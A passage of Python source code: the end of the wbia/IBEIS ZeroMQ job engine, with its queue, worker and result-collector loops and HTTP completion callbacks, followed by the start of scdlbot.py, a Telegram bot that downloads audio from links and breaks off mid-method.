%s_url2 = %r' % (name, interface_push)) try: zmq.device(zmq.QUEUE, recieve_socket, send_socket) # CHECKED - QUEUE except KeyboardInterrupt: print('Caught ctrl+c in queue loop. Gracefully exiting') recieve_socket.unbind(interface_pull) recieve_socket.close() send_socket.unbind(interface_push) send_socket.close() if VERBOSE_JOBS: print('Exiting %s' % (loop_name,)) def engine_queue_loop(port_dict, engine_lanes): """ Specialized queue loop """ # Flow of information tags: # NAME: engine_queue name = 'engine' queue_name = name + '_queue' loop_name = queue_name + '_loop' update_proctitle(queue_name) print = partial(ut.colorprint, color='red') interface_engine_pull = port_dict['engine_pull_url'] interface_engine_push_dict = { lane: port_dict['engine_%s_push_url' % (lane,)] for lane in engine_lanes } interface_collect_pull = port_dict['collect_pull_url'] with ut.Indenter('[%s] ' % (queue_name,)): print('Init specialized make_queue_loop: name=%r' % (name,)) # bind the client dealer to the queue router engine_receive_socket = ctx.socket(zmq.ROUTER) # CHECK2 - REP engine_receive_socket.setsockopt_string( zmq.IDENTITY, 'special_queue.' + name + '.' + 'ROUTER' ) engine_receive_socket.bind(interface_engine_pull) if VERBOSE_JOBS: print('bind %s_url2 = %r' % (name, interface_engine_pull)) # bind the server router to the queue dealer engine_send_socket_dict = {} for lane in interface_engine_push_dict: engine_send_socket = ctx.socket(zmq.DEALER) # CHECKED - DEALER engine_send_socket.setsockopt_string( zmq.IDENTITY, 'special_queue.' + lane + '.' + name + '.' + 'DEALER' ) engine_send_socket.bind(interface_engine_push_dict[lane]) if VERBOSE_JOBS: print( 'bind %s %s_url2 = %r' % (name, lane, interface_engine_push_dict[lane]) ) engine_send_socket_dict[lane] = engine_send_socket collect_recieve_socket = ctx.socket(zmq.DEALER) # CHECKED - DEALER collect_recieve_socket.setsockopt_string( zmq.IDENTITY, queue_name + '.collect.DEALER' ) collect_recieve_socket.connect(interface_collect_pull) if VERBOSE_JOBS: print('connect collect_pull_url = %r' % (interface_collect_pull)) # but this shows what is really going on: poller = zmq.Poller() poller.register(engine_receive_socket, zmq.POLLIN) for lane in engine_send_socket_dict: engine_send_socket = engine_send_socket_dict[lane] poller.register(engine_send_socket, zmq.POLLIN) # always start at 0 global_jobcounter = 0 try: while True: evts = dict(poller.poll()) if engine_receive_socket in evts: # CALLER: job_client idents, engine_request = rcv_multipart_json( engine_receive_socket, num=1, print=print ) set_jobcounter = engine_request.get('__set_jobcounter__', None) if set_jobcounter is not None: global_jobcounter = set_jobcounter reply_notify = { 'jobcounter': global_jobcounter, } print( '... notifying client that jobcounter was updated to %d' % (global_jobcounter,) ) # RETURNS: job_client_return send_multipart_json(engine_receive_socket, idents, reply_notify) continue # jobid = 'jobid-%04d' % (jobcounter,) jobid = '%s' % (uuid.uuid4(),) jobcounter = global_jobcounter + 1 received = _timestamp() action = engine_request['action'] args = engine_request['args'] kwargs = engine_request['kwargs'] callback_url = engine_request['callback_url'] callback_method = engine_request['callback_method'] request = engine_request['request'] restart_jobid = engine_request.get('restart_jobid', None) restart_jobcounter = engine_request.get('restart_jobcounter', None) restart_received = engine_request.get('restart_received', None) lane = engine_request.get('lane', 'slow') if lane not in engine_lanes: print( 'WARNING: did not recognize desired lane %r from %r' % (lane, engine_lanes) ) print('WARNING: Defaulting to slow lane') lane = 'slow' engine_request['lane'] = lane if restart_jobid is not None: '[RESTARTING] Replacing jobid=%s with previous restart_jobid=%s' % ( jobid, restart_jobid, ) jobid = restart_jobid if restart_jobcounter is not None: '[RESTARTING] Replacing jobcounter=%s with previous restart_jobcounter=%s' % ( jobcounter, restart_jobcounter, ) jobcounter = restart_jobcounter print('Creating jobid %r (counter %d)' % (jobid, jobcounter)) if restart_received is not None: received = restart_received ###################################################################### # Status: Received (Notify Collector) # Reply immediately with a new jobid reply_notify = { 'jobid': jobid, 'jobcounter': jobcounter, 'status': 'received', 'action': 'notification', } if VERBOSE_JOBS: print('...notifying collector about new job') # CALLS: collector_notify collect_recieve_socket.send_json(reply_notify) ###################################################################### # Status: Received (Notify Client) if VERBOSE_JOBS: print('... notifying client that job was accepted') print('%r' % (idents,)) print('%r' % (reply_notify,)) # RETURNS: job_client_return send_multipart_json(engine_receive_socket, idents, reply_notify) ###################################################################### # Status: Metadata # Reply immediately with a new jobid metadata_notify = { 'jobid': jobid, 'metadata': { 'jobcounter': jobcounter, 'action': action, 'args': args, 'kwargs': kwargs, 'callback_url': callback_url, 'callback_method': callback_method, 'request': request, 'times': { 'received': received, 'started': None, 'updated': None, 'completed': None, 'runtime': None, 'turnaround': None, 'runtime_sec': None, 'turnaround_sec': None, }, 'lane': lane, }, 'action': 'metadata', } if VERBOSE_JOBS: print('...notifying collector about job metadata') # CALLS: collector_notify collect_recieve_socket.send_json(metadata_notify) ###################################################################### # Status: Accepted (Metadata Processed) # We have been accepted, let's update the global_jobcounter global_jobcounter = jobcounter # Reply immediately with a new jobid reply_notify = { 'jobid': jobid, 'status': 'accepted', 'action': 'notification', } if VERBOSE_JOBS: print('...notifying collector about new job') # CALLS: collector_notify collect_recieve_socket.send_json(reply_notify) ###################################################################### # Status: Queueing on the Engine assert 'jobid' not in engine_request engine_request['jobid'] = jobid if VERBOSE_JOBS: print('... notifying backend engine to start') # CALL: engine_ engine_send_socket = engine_send_socket_dict[lane] send_multipart_json(engine_send_socket, idents, engine_request) # Release idents = None engine_request = None ###################################################################### # Status: Queued queued_notify = { 'jobid': jobid, 'status': 'queued', 'action': 'notification', } if VERBOSE_JOBS: print('...notifying collector that job was queued') # CALLS: collector_notify collect_recieve_socket.send_json(queued_notify) except KeyboardInterrupt: print('Caught ctrl+c in %s queue. Gracefully exiting' % (loop_name,)) poller.unregister(engine_receive_socket) for lane in engine_send_socket_dict: engine_send_socket = engine_send_socket_dict[lane] poller.unregister(engine_send_socket) engine_receive_socket.unbind(interface_engine_pull) engine_receive_socket.close() for lane in interface_engine_push_dict: engine_send_socket = engine_send_socket_dict[lane] engine_send_socket.unbind(interface_engine_push_dict[lane]) engine_send_socket.close() collect_recieve_socket.disconnect(interface_collect_pull) collect_recieve_socket.close() if VERBOSE_JOBS: print('Exiting %s queue' % (loop_name,)) def engine_loop(id_, port_dict, dbdir, containerized, lane): r""" IBEIS: This will be part of a worker process with its own IBEISController instance. Needs to send where the results will go and then publish the results there. The engine_loop - receives messages, performs some action, and sends a reply, preserving the leading two message parts as routing identities """ # NAME: engine_ # CALLED_FROM: engine_queue import wbia try: import tensorflow as tf # NOQA from keras import backend as K # NOQA config = tf.ConfigProto() config.gpu_options.allow_growth = True sess = tf.Session(config=config) K.set_session(sess) except (ImportError, RuntimeError): pass # base_print = print # NOQA print = partial(ut.colorprint, color='brightgreen') with ut.Indenter('[engine %s %d] ' % (lane, id_)): interface_engine_push = port_dict['engine_%s_push_url' % (lane,)] interface_collect_pull = port_dict['collect_pull_url'] if VERBOSE_JOBS: print('Initializing %s engine %s' % (lane, id_)) print('connect engine_%s_push_url = %r' % (lane, interface_engine_push)) assert dbdir is not None engine_send_sock = ctx.socket(zmq.ROUTER) # CHECKED - ROUTER engine_send_sock.setsockopt_string( zmq.IDENTITY, 'engine.%s.%s' % (lane, id_), ) engine_send_sock.connect(interface_engine_push) collect_recieve_socket = ctx.socket(zmq.DEALER) collect_recieve_socket.setsockopt_string( zmq.IDENTITY, 'engine.%s.%s.collect.DEALER' % (lane, id_), ) collect_recieve_socket.connect(interface_collect_pull) if VERBOSE_JOBS: print('connect collect_pull_url = %r' % (interface_collect_pull,)) print('engine is initialized') ibs = wbia.opendb(dbdir=dbdir, use_cache=False, web=False, daily_backup=False) update_proctitle('engine_loop.%s.%s' % (lane, id_), dbname=ibs.dbname) try: while True: try: idents, engine_request = rcv_multipart_json( engine_send_sock, print=print ) action = engine_request['action'] jobid = engine_request['jobid'] args = engine_request['args'] kwargs = engine_request['kwargs'] callback_url = engine_request['callback_url'] callback_method = engine_request['callback_method'] lane_ = engine_request['lane'] if VERBOSE_JOBS: print('\tjobid = %r' % (jobid,)) print('\taction = %r' % (action,)) print('\targs = %r' % (args,)) print('\tkwargs = %r' % (kwargs,)) print('\tlane = %r' % (lane,)) print('\tlane_ = %r' % (lane_,)) # Notify start working reply_notify = { # 'idents': idents, 'jobid': jobid, 'status': 'working', 'action': 'notification', } collect_recieve_socket.send_json(reply_notify) engine_result = on_engine_request(ibs, jobid, action, args, kwargs) exec_status = engine_result['exec_status'] # Notify start working reply_notify = { # 'idents': idents, 'jobid': jobid, 'status': 'publishing', 'action': 'notification', } collect_recieve_socket.send_json(reply_notify) # Store results in the collector collect_request = { # 'idents': idents, 'action': 'store', 'jobid': jobid, 'engine_result': engine_result, 'callback_url': callback_url, 'callback_method': callback_method, } # if VERBOSE_JOBS: print( '...done working. pushing result to collector for jobid %s' % (jobid,) ) # CALLS: collector_store collect_recieve_socket.send_json(collect_request) # Notify start working reply_notify = { # 'idents': idents, 'jobid': jobid, 'status': exec_status, 'action': 'notification', } collect_recieve_socket.send_json(reply_notify) # We no longer need the engine result, and can clear it's memory engine_request = None engine_result = None collect_request = None except KeyboardInterrupt: raise except Exception as ex: result = ut.formatex(ex, keys=['jobid'], tb=True) result = ut.strip_ansi(result) print_ = partial(ut.colorprint, color='brightred') with ut.Indenter('[job engine worker error] '): print_(result) raise except KeyboardInterrupt: print('Caught ctrl+c in engine loop. Gracefully exiting') engine_send_sock.disconnect(interface_engine_push) engine_send_sock.close() collect_recieve_socket.disconnect(interface_collect_pull) collect_recieve_socket.close() # Release the IBEIS controller for each job, hopefully freeing memory ibs = None # Explicitly try to release GPU memory try: import torch torch.cuda.empty_cache() except Exception: pass # Explicitly release Python memory try: import gc gc.collect() except Exception: pass # ---- if VERBOSE_JOBS: print('Exiting engine loop') def on_engine_request( ibs, jobid, action, args, kwargs, attempts=3, retry_delay_min=1, retry_delay_max=60 ): """ Run whenever the engine recieves a message """ assert attempts > 0 attempts = int(attempts) assert 0 <= retry_delay_min and retry_delay_min <= 60 * 60 retry_delay_min = int(retry_delay_min) assert 0 <= retry_delay_max and retry_delay_max <= 60 * 60 retry_delay_max = int(retry_delay_max) assert retry_delay_min < retry_delay_max # Start working if VERBOSE_JOBS: print('starting job=%r' % (jobid,)) # Map actions to IBEISController calls here if action == 'helloworld': def helloworld(time_=0, *args, **kwargs): time.sleep(time_) retval = ('HELLO time_=%r ' % (time_,)) + ut.repr2((args, kwargs)) return retval action_func = helloworld else: # check for ibs func action_func = getattr(ibs, action) if VERBOSE_JOBS: print('resolving action=%r to wbia function=%r' % (action, action_func)) key = '__jobid__' kwargs[key] = jobid exec_status = None while exec_status is None: try: attempt = 0 while attempt < 10: # Global max attempts of 10 attempt += 1 try: result = action_func(*args, **kwargs) break # success, no exception, break out of the loop except Exception: if attempt < attempts: print( 'JOB %r FAILED (attempt %d of %d)!' % (jobid, attempt, attempts) ) retry_delay = random.uniform(retry_delay_min, retry_delay_max) print('\t WAITING %0.02f SECONDS THEN RETRYING' % (retry_delay,)) time.sleep(retry_delay) else: raise exec_status = 'completed' except Exception as ex: # Remove __jobid__ from kwargs if it's not accepted by the action_func if key in kwargs: kwargs.pop(key, None) continue result = ut.formatex(ex, keys=['jobid'], tb=True) result = ut.strip_ansi(result) exec_status = 'exception' json_result = ut.to_json(result) result = None # Clear any used memory engine_result = { 'exec_status': exec_status, 'json_result': json_result, 'jobid': jobid, } return engine_result def collector_loop(port_dict, dbdir, containerized): """ Service that stores completed algorithm results """ import wbia print = partial(ut.colorprint, color='yellow') with ut.Indenter('[collect] '): collect_rout_sock = ctx.socket(zmq.ROUTER) # CHECK2 - PULL collect_rout_sock.setsockopt_string(zmq.IDENTITY, 'collect.ROUTER') collect_rout_sock.connect(port_dict['collect_push_url']) if VERBOSE_JOBS: print('connect collect_push_url = %r' % (port_dict['collect_push_url'],)) ibs = wbia.opendb(dbdir=dbdir, use_cache=False, web=False, daily_backup=False) update_proctitle('collector_loop', dbname=ibs.dbname) shelve_path = ibs.get_shelves_path() ut.ensuredir(shelve_path) collector_data = {} try: while True: # several callers here # CALLER: collector_notify # CALLER: collector_store # CALLER: collector_request_status # CALLER: collector_request_metadata # CALLER: collector_request_result idents, collect_request = rcv_multipart_json( collect_rout_sock, print=print ) try: reply = on_collect_request( ibs, collect_request, collector_data, shelve_path, containerized=containerized, ) except Exception as ex: import traceback print(ut.repr3(collect_request)) ut.printex(ex, 'ERROR in collection') print(traceback.format_exc()) reply = {} send_multipart_json(collect_rout_sock, idents, reply) idents = None collect_request = None # Explicitly release Python memory try: import gc gc.collect() except Exception: pass except KeyboardInterrupt: print('Caught ctrl+c in collector loop. Gracefully exiting') collect_rout_sock.disconnect(port_dict['collect_push_url']) collect_rout_sock.close() if VERBOSE_JOBS: print('Exiting collector') def _timestamp(): timezone = pytz.timezone(TIMESTAMP_TIMEZONE) now = datetime.now(timezone) timestamp = now.strftime(TIMESTAMP_FMTSTR) return timestamp def invalidate_global_cache(jobid): global JOB_STATUS_CACHE JOB_STATUS_CACHE.pop(jobid, None) def get_collector_shelve_filepaths(collector_data, jobid): if jobid is None: return None, None shelve_input_filepath = collector_data.get(jobid, {}).get('input', None) shelve_output_filepath = collector_data.get(jobid, {}).get('output', None) return shelve_input_filepath, shelve_output_filepath def convert_to_date(timestamp): TIMESTAMP_FMTSTR_ = ' '.join(TIMESTAMP_FMTSTR.split(' ')[:-1]) timestamp_ = ' '.join(timestamp.split(' ')[:-1]) timestamp_date = datetime.strptime(timestamp_, TIMESTAMP_FMTSTR_) return timestamp_date def calculate_timedelta(start, end): start_date = convert_to_date(start) end_date = convert_to_date(end) delta = end_date - start_date total_seconds = int(delta.total_seconds()) total_seconds_ = total_seconds hours = total_seconds_ // (60 * 60) total_seconds_ -= hours * 60 * 60 minutes = total_seconds_ // 60 total_seconds_ -= minutes * 60 seconds = total_seconds_ return hours, minutes, seconds, total_seconds def on_collect_request( ibs, collect_request, collector_data, shelve_path, containerized=False ): """ Run whenever the collector recieves a message """ import requests action = collect_request.get('action', None) jobid = collect_request.get('jobid', None) status = collect_request.get('status', None) reply = { 'status': 'ok', 'jobid': jobid, } # Ensure we have a collector record for the jobid if jobid is not None: if jobid not in collector_data: collector_data[jobid] = { 'status': None, 'input': None, 'output': None, } runtime_lock_filepath = join(shelve_path, '%s.lock' % (jobid,)) else: runtime_lock_filepath = None args = get_collector_shelve_filepaths(collector_data, jobid) collector_shelve_input_filepath, collector_shelve_output_filepath = args print( 'on_collect_request action = %r, jobid = %r, status = %r' % ( action, jobid, status, ) ) if action == 'notification': assert None not in [jobid, runtime_lock_filepath] # received # accepted # queued # working # publishing # completed # exception # suppressed # corrupted current_status = collector_data[jobid].get('status', None) print('Updating jobid = %r status %r -> %r' % (jobid, current_status, status)) collector_data[jobid]['status'] = status print('Notify %s' % ut.repr3(collector_data[jobid])) invalidate_global_cache(jobid) if status == 'received': ut.touch(runtime_lock_filepath) if status == 'completed': if exists(runtime_lock_filepath): ut.delete(runtime_lock_filepath) # Mark the engine request as finished record_filename = '%s.pkl' % (jobid,) record_filepath = join(shelve_path, record_filename) record = ut.load_cPkl(record_filepath, verbose=False) record['completed'] = True ut.save_cPkl(record_filepath, record, verbose=False) record = None # Update relevant times in the shelf if collector_shelve_input_filepath is None: metadata = None else: metadata = get_shelve_value(collector_shelve_input_filepath, 'metadata') if metadata is not None: times = metadata.get('times', {}) times['updated'] = _timestamp() if status == 'working': times['started'] = _timestamp() if status == 'completed': times['completed'] = _timestamp() # Calculate runtime received = times.get('received', None) started = times.get('started', None) completed = times.get('completed', None) runtime = times.get('runtime', None) turnaround = times.get('turnaround', None) if None not in [started, completed] and runtime is None: hours, minutes, seconds, total_seconds = calculate_timedelta( started, completed ) args = ( hours, minutes, seconds, total_seconds, ) times['runtime'] = '%d hours %d min. %s sec. (total: %d sec.)' % args times['runtime_sec'] = total_seconds if None not in [received, completed] and turnaround is None: hours, minutes, seconds, total_seconds = calculate_timedelta( received, completed ) args = ( hours, minutes, seconds, total_seconds, ) times['turnaround'] = '%d hours %d min. %s sec. (total: %d sec.)' % args times['turnaround_sec'] = total_seconds metadata['times'] = times set_shelve_value(collector_shelve_input_filepath, 'metadata', metadata) metadata = None # Release memory elif action == 'register': assert None not in [jobid] invalidate_global_cache(jobid) shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths(ibs, jobid) metadata = get_shelve_value(shelve_input_filepath, 'metadata') engine_result = get_shelve_value(shelve_output_filepath, 'result') if status == 'completed': # Ensure we can read the data we expect out of a completed job if None in [metadata, engine_result]: status = 'corrupted' collector_data[jobid] = { 'status': status, 'input': shelve_input_filepath, 'output': shelve_output_filepath, } print('Register %s' % ut.repr3(collector_data[jobid])) metadata, engine_result = None, None # Release memory elif action == 'metadata': invalidate_global_cache(jobid) # From the Engine metadata = collect_request.get('metadata', None) shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths(ibs, jobid) collector_data[jobid]['input'] = shelve_input_filepath set_shelve_value(shelve_input_filepath, 'metadata', metadata) print('Stored Metadata %s' % ut.repr3(collector_data[jobid])) metadata = None # Release memory elif action == 'store': invalidate_global_cache(jobid) # From the Engine engine_result = collect_request.get('engine_result', None) callback_url = collect_request.get('callback_url', None) callback_method = collect_request.get('callback_method', None) # Get the engine result jobid jobid = engine_result.get('jobid', jobid) assert jobid in collector_data shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths(ibs, jobid) collector_data[jobid]['output'] = shelve_output_filepath set_shelve_value(shelve_output_filepath, 'result', engine_result) print('Stored Result %s' % ut.repr3(collector_data[jobid])) engine_result = None # Release memory if callback_url is not None: if containerized: callback_url = callback_url.replace('://localhost/', '://wildbook:8080/') if callback_method is None: callback_method = 'POST' callback_method = callback_method.upper() message = 'callback_method %r unsupported' % (callback_method,) assert callback_method in ['POST', 'GET', 'PUT'], message try: data_dict = {'jobid': jobid} args = ( callback_url, callback_method, data_dict, ) print( 'Attempting job completion callback to %r\n\tHTTP Method: %r\n\tData Payload: %r' % args ) # Perform callback if callback_method == 'POST': response = requests.post(callback_url, data=data_dict) elif callback_method == 'GET': response = requests.get(callback_url, params=data_dict) elif callback_method == 'PUT': response = requests.put(callback_url, data=data_dict) else: raise RuntimeError() # Check response try: text = unicode(response.text).encode('utf-8') # NOQA except Exception: text = None args = ( response, text, ) print('Callback completed...\n\tResponse: %r\n\tText: %r' % args) except Exception: print('Callback FAILED!') elif action == 'job_status': reply['jobstatus'] = collector_data.get(jobid, {}).get('status', 'unknown') elif action == 'job_status_dict': json_result = {} for jobid in collector_data: if jobid in JOB_STATUS_CACHE: job_status_data = JOB_STATUS_CACHE.get(jobid, None) else: status = collector_data[jobid]['status'] shelve_input_filepath, shelve_output_filepath = get_shelve_filepaths( ibs, jobid ) metadata = get_shelve_value(shelve_input_filepath, 'metadata') cache = True if metadata is None: if status in ['corrupted']: status = 'corrupted' elif status in ['suppressed']: status = 'suppressed' elif status in ['completed']: status = 'corrupted' else: # status = 'pending' cache = False metadata = { 'jobcounter': -1, } times = metadata.get('times', {}) request = metadata.get('request', {}) # Support legacy jobs if request is None: request = {} job_status_data = { 'status': status, 'jobcounter': metadata.get('jobcounter', None), 'action': metadata.get('action', None), 'endpoint': request.get('endpoint', None), 'function': request.get('function', None), 'time_received': times.get('received', None), 'time_started': times.get('started', None), 'time_runtime': times.get('runtime', None), 'time_updated': times.get('updated', None), 'time_completed': times.get('completed', None), 'time_turnaround': times.get('turnaround', None), 'time_runtime_sec': times.get('runtime_sec', None), 'time_turnaround_sec': times.get('turnaround_sec', None), 'lane': metadata.get('lane', None), } if cache: JOB_STATUS_CACHE[jobid] = job_status_data json_result[jobid] = job_status_data reply['json_result'] = json_result metadata = None # Release memory elif action == 'job_id_list': reply['jobid_list'] = sorted(list(collector_data.keys())) elif action == 'job_input': if jobid not in collector_data: reply['status'] = 'invalid' metadata = None else: metadata = get_shelve_value(collector_shelve_input_filepath, 'metadata') if metadata is None: reply['status'] = 'corrupted' reply['json_result'] = metadata metadata = None # Release memory elif action == 'job_result': if jobid not in collector_data: reply['status'] = 'invalid' result = None else: status = collector_data[jobid]['status'] engine_result = get_shelve_value(collector_shelve_output_filepath, 'result') if engine_result is None: if status in ['corrupted']: status = 'corrupted' elif status in ['suppressed']: status = 'suppressed' elif status in ['completed']: status = 'corrupted' else: # status = 'pending' pass reply['status'] = status result = None else: reply['status'] = engine_result['exec_status'] json_result = engine_result['json_result'] result = ut.from_json(json_result) reply['json_result'] = result engine_result = None # Release memory else: # Other print('...error unknown action=%r' % (action,)) reply['status'] = 'error' return reply def send_multipart_json(sock, idents, reply): """ helper """ reply_json = ut.to_json(reply).encode('utf-8') reply = None multi_reply = idents + [reply_json] sock.send_multipart(multi_reply) def rcv_multipart_json(sock, num=2, print=print): """ helper """ # note that the first two parts will be ['Controller.ROUTER', 'Client.<id_>'] # these are needed for the reply to propagate up to the right client multi_msg = sock.recv_multipart() if VERBOSE_JOBS: print('----') print('RCV Json: %s' % (ut.repr2(multi_msg, truncate=True),)) idents = multi_msg[:num] request_json = multi_msg[num] request = ut.from_json(request_json) request_json = None multi_msg = None return idents, request def _on_ctrl_c(signal, frame): print('[wbia.zmq] Caught ctrl+c') print('[wbia.zmq] sys.exit(0)') import sys sys.exit(0) def _init_signals(): import signal signal.signal(signal.SIGINT, _on_ctrl_c) if __name__ == '__main__': """ CommandLine: python -m ibeis.web.job_engine python -m ibeis.web.job_engine --allexamples python -m ibeis.web.job_engine --allexamples --noface --nosrc """ import multiprocessing multiprocessing.freeze_support() # for win32 import utool as ut # NOQA ut.doctest_funcs()
scdlbot.py
# -*- coding: utf-8 -*- """Main module.""" import gc import pathlib import random import shelve import shutil from datetime import datetime from multiprocessing import Process, Queue from queue import Empty from subprocess import PIPE, TimeoutExpired # skipcq: BAN-B404 from urllib.parse import urljoin, urlparse from uuid import uuid4 import ffmpeg from boltons.urlutils import find_all_links from mutagen.id3 import ID3 from mutagen.mp3 import EasyMP3 as MP3 from prometheus_client import Summary from telegram import (Message, Chat, ChatMember, MessageEntity, ChatAction, InlineKeyboardMarkup, InlineKeyboardButton, InlineQueryResultAudio, Update) from telegram.error import (TelegramError, Unauthorized, BadRequest, TimedOut, ChatMigrated, NetworkError) from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, InlineQueryHandler, CallbackQueryHandler, CallbackContext) from telegram.ext.dispatcher import run_async from scdlbot.utils import * logger = logging.getLogger(__name__) REQUEST_TIME = Summary('request_processing_seconds', 'Time spent processing request') class ScdlBot: def __init__(self, tg_bot_token, tg_bot_api="https://api.telegram.org", proxies=None, store_chat_id=None, no_flood_chat_ids=None, alert_chat_ids=None, dl_dir="/tmp/scdlbot", dl_timeout=300, max_tg_file_size=45_000_000, max_convert_file_size=80_000_000, chat_storage_file="/tmp/scdlbotdata", app_url=None, serve_audio=False, cookies_file=None, source_ips=None): self.SITES = { "sc": "soundcloud", "scapi": "api.soundcloud", "bc": "bandcamp", "yt": "youtu", } self.APP_URL = app_url self.DL_TIMEOUT = dl_timeout self.TG_BOT_API = tg_bot_api self.MAX_TG_FILE_SIZE = max_tg_file_size self.MAX_CONVERT_FILE_SIZE = max_convert_file_size self.SERVE_AUDIO = serve_audio if self.SERVE_AUDIO: self.MAX_TG_FILE_SIZE = 19_000_000 self.HELP_TEXT = get_response_text('help.tg.md') self.SETTINGS_TEXT = get_response_text('settings.tg.md') self.DL_TIMEOUT_TEXT = get_response_text('dl_timeout.txt').format(self.DL_TIMEOUT // 60) self.WAIT_BIT_TEXT = [get_response_text('wait_bit.txt'), get_response_text('wait_beat.txt'), get_response_text('wait_beet.txt')] self.NO_AUDIO_TEXT = get_response_text('no_audio.txt') self.NO_URLS_TEXT = get_response_text('no_urls.txt') self.OLG_MSG_TEXT = get_response_text('old_msg.txt') self.REGION_RESTRICTION_TEXT = get_response_text('region_restriction.txt') self.DIRECT_RESTRICTION_TEXT = get_response_text('direct_restriction.txt') self.LIVE_RESTRICTION_TEXT = get_response_text('live_restriction.txt') # self.chat_storage = {} self.chat_storage = shelve.open(chat_storage_file, writeback=True) for chat_id in no_flood_chat_ids: self.init_chat(chat_id=chat_id, chat_type=Chat.PRIVATE if chat_id > 0 else Chat.SUPERGROUP, flood="no") self.ALERT_CHAT_IDS = set(alert_chat_ids) if alert_chat_ids else set() self.STORE_CHAT_ID = store_chat_id self.DL_DIR = dl_dir self.COOKIES_DOWNLOAD_FILE = "/tmp/scdlbot_cookies.txt" self.proxies = proxies self.source_ips = source_ips # https://yandex.com/support/music-app-ios/search-and-listen/listening-abroad.html self.cookies_file = cookies_file # if sc_auth_token: # config = configparser.ConfigParser() # config['scdl'] = {} # config['scdl']['path'] = self.DL_DIR # config['scdl']['auth_token'] = sc_auth_token # config_dir = os.path.join(os.path.expanduser('~'), '.config', 'scdl') # config_path = os.path.join(config_dir, 'scdl.cfg') # os.makedirs(config_dir, exist_ok=True) # with open(config_path, 'w') as config_file: # config.write(config_file) self.updater = Updater(token=tg_bot_token, base_url=f"{self.TG_BOT_API}/bot", use_context=True, base_file_url=f"{self.TG_BOT_API}/file/bot") dispatcher = self.updater.dispatcher start_command_handler = CommandHandler('start', self.help_command_callback) dispatcher.add_handler(start_command_handler) help_command_handler = CommandHandler('help', self.help_command_callback) dispatcher.add_handler(help_command_handler) settings_command_handler = CommandHandler('settings', self.settings_command_callback) dispatcher.add_handler(settings_command_handler) dl_command_handler = CommandHandler('dl', self.common_command_callback, filters=~Filters.update.edited_message & ~Filters.forwarded) dispatcher.add_handler(dl_command_handler) link_command_handler = CommandHandler('link', self.common_command_callback, filters=~Filters.update.edited_message & ~Filters.forwarded) dispatcher.add_handler(link_command_handler) message_with_links_handler = MessageHandler(~Filters.update.edited_message & ~Filters.command & ((Filters.text & (Filters.entity(MessageEntity.URL) | Filters.entity(MessageEntity.TEXT_LINK))) | (Filters.caption & (Filters.caption_entity(MessageEntity.URL) | Filters.caption_entity( MessageEntity.TEXT_LINK)))), self.common_command_callback) dispatcher.add_handler(message_with_links_handler) button_query_handler = CallbackQueryHandler(self.button_query_callback) dispatcher.add_handler(button_query_handler) inline_query_handler = InlineQueryHandler(self.inline_query_callback) dispatcher.add_handler(inline_query_handler) unknown_handler = MessageHandler(Filters.command, self.unknown_command_callback) dispatcher.add_handler(unknown_handler) dispatcher.add_error_handler(self.error_callback) self.bot_username = self.updater.bot.get_me().username self.RANT_TEXT_PRIVATE = "Read /help to learn how to use me" self.RANT_TEXT_PUBLIC = "[Start me in PM to read help and learn how to use me](t.me/{}?start=1)".format( self.bot_username) def start(self, use_webhook=False, webhook_host="127.0.0.1", webhook_port=None, cert_file=None, cert_key_file=None, url_path="scdlbot"): if use_webhook: self.updater.start_webhook(listen=webhook_host, port=webhook_port, url_path=url_path) # cert=cert_file if cert_file else None, # key=cert_key_file if cert_key_file else None, # webhook_url=urljoin(app_url, url_path)) self.updater.bot.set_webhook(url=urljoin(self.APP_URL, url_path), certificate=open(cert_file, 'rb') if cert_file else None) else: self.updater.start_polling() logger.warning("Bot started") self.updater.idle() def unknown_command_callback(self, update: Update, context: CallbackContext): pass # bot.send_message(chat_id=update.message.chat_id, text="Unknown command") def error_callback(self, update: Update, context: CallbackContext): # skipcq: PYL-R0201 try: raise context.error except Unauthorized: # remove update.message.chat_id from conversation list logger.debug('Update {} caused Unauthorized error: {}'.format(update, context.error)) except BadRequest: # handle malformed requests - read more below! logger.debug('Update {} caused BadRequest error: {}'.format(update, context.error)) except TimedOut: # handle slow connection problems logger.debug('Update {} caused TimedOut error: {}'.format(update, context.error)) except NetworkError: # handle other connection problems logger.debug('Update {} caused NetworkError: {}'.format(update, context.error)) except ChatMigrated as e: # the chat_id of a group has changed, use e.new_chat_id instead logger.debug('Update {} caused ChatMigrated error: {}'.format(update, context.error)) except TelegramError: # handle all other telegram related errors logger.debug('Update {} caused TelegramError: {}'.format(update, context.error)) def init_chat(self, message=None, chat_id=None, chat_type=None, flood="yes"): if message: chat_id = str(message.chat_id) chat_type = message.chat.type else: chat_id = str(chat_id) if chat_id not in self.chat_storage: self.chat_storage[chat_id] = {} if "settings" not in self.chat_storage[chat_id]: self.chat_storage[chat_id]["settings"] = {} if "mode" not in self.chat_storage[chat_id]["settings"]: if chat_type == Chat.PRIVATE: self.chat_storage[chat_id]["settings"]["mode"] = "dl" else: self.chat_storage[chat_id]["settings"]["mode"] = "ask" if "flood" not in self.chat_storage[chat_id]["settings"]: self.chat_storage[chat_id]["settings"]["flood"] = flood if "rant_msg_ids" not in self.chat_storage[chat_id]["settings"]: self.chat_storage[chat_id]["settings"]["rant_msg_ids"] = [] self.chat_storage.sync() # logger.debug("Current chat_storage: %r", self.chat_storage) def cleanup_chat(self, chat_id): chat_msgs = self.chat_storage[str(chat_id)].copy() for msg_id in chat_msgs: if msg_id != "settings": timedelta = datetime.now() - self.chat_storage[str(chat_id)][msg_id]["message"].date if timedelta.days > 0: self.chat_storage[str(chat_id)].pop(msg_id) self.chat_storage.sync() def rant_and_cleanup(self, bot, chat_id, rant_text, reply_to_message_id=None): rant_msg = bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=rant_text, parse_mode='Markdown', disable_web_page_preview=True) flood = self.chat_storage[str(chat_id)]["settings"]["flood"] if flood == "no": rant_msgs = self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].copy() for rant_msg_id in rant_msgs: try: bot.delete_message(chat_id=chat_id, message_id=rant_msg_id) except: pass self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].remove(rant_msg_id) self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].append(rant_msg.message_id) self.chat_storage.sync() def help_command_callback(self, update: Update, context: CallbackContext): self.init_chat(update.message) event_name = "help" entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND]) for entity_value 